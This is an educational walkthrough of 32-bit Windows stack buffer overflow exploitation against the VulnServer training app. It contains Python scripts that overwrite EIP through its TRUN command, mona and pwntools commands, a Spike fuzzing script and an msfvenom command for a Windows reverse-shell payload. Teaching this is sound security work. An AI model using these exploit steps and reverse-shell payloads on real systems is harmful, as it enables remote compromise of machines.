win32

..# Windows 32 Bit Buffer Overflow

Introduction

To start with understanding buffer overflow in Windows, it is a good idea to start with the simplest of forms. This will describe buffer overflows in Windows 32 bit programs that do not use memory protections.

Tools to Download

Immunity Debugger
Mona for Immunity Debugger
VulnServer

Resources

- This is the vulnerable application used in John Hammond's video
- A good and well known debugger
- A needed addon for Immunity Debugger
- Another good debugger

Steps

Fuzz the application
1. Find a function or input that you want to fuzz to see if you can get the application to crash.
Once you have crashed the program, open it in a debugger to see what causes the crash.
Using the debugger after the program crashes, get an idea of how many A's were sent by subtracting the value of the hex value in the hex dump where the first A is from the hex of the last A.
1. This can be done using Windows' calculator is "Programmer" mode.
Creat a script to crash the program
1. I like to use python for this
Find the offset to see where the corrupt memory happens
1. Create a pattern to send the program to help identify where the eip gets overwritten
  1. msf-pattern_create is a good tool to help with this
  2. if msf-pattern_create and msf-pattern_offset fail to get a lock on the offset try pwntools
2. Find the part of the pattern that caused the corruption in Immunity Debugger by copying the contents of EIP
3. Send the contents of that point in memmory to msf-pattern_offset
  1. This will give you the offset that you will need so you can control the EIP.
Verify that you can control the EIP by sending a payload of A's until the offset then 4 Bs and the rest Cs.
1. Your offset may not be perfect so you may need to adjust it up or down.
  1. If you are getting A's in the eip, subtract by how many A's are in the eip
  2. If you are getting C's in the eip, add by how many C's are in the eip
2. You will know this worked if the EIP is filled with 42424242
Now find a way to get the program to jump to a section of code you can control
1. For example, if you have control over the ESP (you may see a bunch of Cs), try to find a bit of code that is always found at the same memory address to jmp eip.
2. This can be done using immunity debugger by using the mona plugin.
3. Look for a register that does not have any memory protections.
Copy the address in little endian format into your script.
1. Example: The memory address 0x62501205 will become \x05\x12\x50\x62
Test that you are able to jump to the esp that you are aiming for
1. One thing to note is if your EIP is not hex, you will need to convert it from hex to whatever it is showing.
  1. For example if you are using B to overwrite your EIP and you see the literal "B" instead of 42, you know you need to have the literal version of the hex representation
  2. If the memory register is 0x62501205, then you will need to have your new_eip to be 05125062
2. Do this by putting a breakpoint on that memory location you are aiming for
  1. If the program breaks there, it is a good sign you are ready to move on
Check for bad bytes
1. There is a chance that certain bytes will crash your program
  1. One example is a null byte
Set up a NOP Sled (at least use 16)
Check to see how much space you have available for your shellcode
1. You can do this by running your exploit with A's for offset, your new_eip, nop_sled, and C's where your shell code will go
2. Set up a breakpoint in on the jmp memory point
3. Step into the C section
4. Subtract the highest + 1 memory location from the lowest that is filled with C's
  1. If the register is showing 8 bytes then multiply that by 2
Create your shellcode
1. An easy way is to use msfvenom
  1. If the debugger is showing your input in literal form, you will need to use the "hex" format in msfvenom
If the shell code is too large you can try to expand the C buffer to see if more space can be used for the shell code.

Fuzzing TCP Application Using Spike

Spike is a colleciton of programs that can be used to fuzz appllications:

Spike is built into Kali

generic_send_tcp

You need to create a "spike_script" which will be used to send data to the program you are trying to fuzz. Spike scipts will end in .spk.

s_readline();
s_string("TRUN ");
s_string_variable("FUZZ");

generic_send_tcp <IP> <port> <spike-script.spk> 0 0

Immunity Debugger

Keyboard Shortcuts

F3 = File Open CTRL+F2 = Restart a program F9 = Run F2 = Set Breakpoint F7 = Step through the code CTRL+G = Go to

Python Script For Crashing

#!/usr/bin/env python3
import socket
s = socket.socket()

target ="IP ADDRESS"
port = PORT-NUMBER

s.connect((target,port))

prefix = b"Any Needed Prefix"
total_length = 1000 # The total length of the payload; not to include the prefix

payload = [
  prefix,
  b"A" * total_length
  ]

payload = b"".join(payload)

s.send(payload)

s.close()

Python Script for Sending the Pattern

#!/usr/bin/env python3
import socket
s = socket.socket()

target ="IP ADDRESS"
port = PORT-NUMBER

s.connect((target,port))

prefix = b"Any Needed Prefix"
total_length = 1000 # The total length of the payload; not to include the prefix
pattern = b"PASTE PATTERN HERE" 
payload = [
  prefix,
  pattern 
  ]

payload = b"".join(payload)

s.send(payload)

s.close()

Python Script for Geting EIP Control

#!/usr/bin/env python3

import socket
s = socket.socket()

target = "192.168.0.77"
port = 9999

s.connect((target,port))

prefix = b"TRUN /.:/"
total_length = 2984
offset = 2003
new_eip = b"B" * 4


payload = [
        prefix,
        b"A" * offset,
        b"B" * 4,
        b"C" * (total_length - offset -4)
        ]

payload = b"".join(payload)


s.send (payload)
s.close()

Python Script for Testing JMP

#!/usr/bin/env python3

import socket
s = socket.socket()

target = "192.168.0.77"
port = 9999

s.connect((target,port))

prefix = b"TRUN /.:/"
total_length = 2984
offset = 2003
new_eip = b"\x05\x12\x50\x62"


payload = [
        prefix,
        b"A" * offset,
        new_eip,
        b"C" * ( total_length - offset - len(new_eip) )
        ]

payload = b"".join(payload)


s.send (payload)
s.close()

Python Script for Checking Bad Chars

#!/usr/bin/env python3

import socket
import struct

s = socket.socket()

target = "192.168.0.77"
port = 9999

s.connect((target,port))

prefix = b"TRUN /.:/"
total_length = 2984
offset = 2003
new_eip = b"\x05\x12\x50\x62"
all_chars = b"".join([ struct.pack('<B',x) for x in range(1,256) ])

payload = [
        prefix,
        b"A" * offset,
        new_eip,
        all_chars
        ]

payload = b"".join(payload)


s.send (payload)
s.close()

Finding jmp Commands in Mona

In this example we will look for jmp esp

!mona jmp -r esp -cpb "\x00"

The -cpb is where you put a list of bad chars so mona knows not to show registers with that address. This will supply a list of registers that have jmp esp.

Finding bad chars with Mona

Generate the byte array

!mona bytearray -b "\x00"

The -b specifies the bad chars you do not want to generate. This will write the bytearray to a file. We will use the bytearray.bin instead of the bytearray.txt.

Compare the dump with the bytearray

!mona compare -f <location to the bytearray.bin> -a <mem address>

Doing this may give you characters that truly are not bad. The initial bad character may have caused a ripple effect. The best way to make sure that you identify only bad characters is to repeat the process and exclude the first bad char identified by mona.

Create a Payload with MSFVenom

msfvenom -p windows/shell_reverse_tcp LHOST=eth0 LPORT=1333 -f python -b "\x00" -v shell_code EXITFUNC=thread

In the -b section you can add as many bad characters as you want. LHOST can either be an interface name or an IP address. The -v allows you to name the variable.

Getting the Offset with pwntools

Get the pattern

pwn cyclic -a "123456789ABCDEF" 4000

Get the offset:

pwn cyclic -a "123456789ABCDEF" -l <eip value>

PreviousBuffer Overflow NextWindows

Last updated 3 years ago

Was this helpful?